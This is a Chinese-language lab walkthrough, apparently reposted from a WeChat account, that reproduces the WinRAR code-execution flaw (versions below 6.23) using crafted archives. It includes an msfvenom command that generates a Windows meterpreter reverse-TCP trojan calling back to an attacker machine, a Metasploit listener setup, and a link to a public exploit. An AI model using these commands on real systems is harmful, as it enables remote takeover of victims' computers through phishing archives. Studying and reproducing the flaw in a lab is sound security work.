WinRAR代码执行漏洞复现
小记
该漏洞存在于RARLAB WinRAR中,是一个代码执行漏洞。攻击者可以构造压缩包文件,其中包含一个良性文件(例如普通的. jpg文件)和一个与良性文件同名的恶意文件,诱导用户尝试访问良性文件即可触发漏洞并自动执行该恶意程序,进而控制用户计算机。
影响版本: <6.23
安全版本: >= 6.23
利用方式:
受害者打开压缩包中的 txt/jpg/pdf 等后缀文件
执行 exe (木马)和对应正常的文件。
-
下载6.11版本用于漏洞复现
-
下载exp测试
-
模拟受害者机器win10(IP:172.16.29.129)
-
模拟攻击者机器kali(IP:172.16.29.136 )
#kali木马生成exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.29.136 LPORT=8686 -f exe -o /home/kali/ceshi.exe
#另起终端监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.29.136
set lport 8686
run
-
复现1:bat执行calc命令
双击弹出计算器
-
复现2:执行恶意ceshi.exe(钓鱼)
-
恶意exe可以直接复制到目录即可
#exp参考
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://github.com/Garck3h/cve-2023-38831
#winrar下载
https://www.winrar.com.cn/download.htm
原文始发于微信公众号(echoabced):WinRAR代码执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论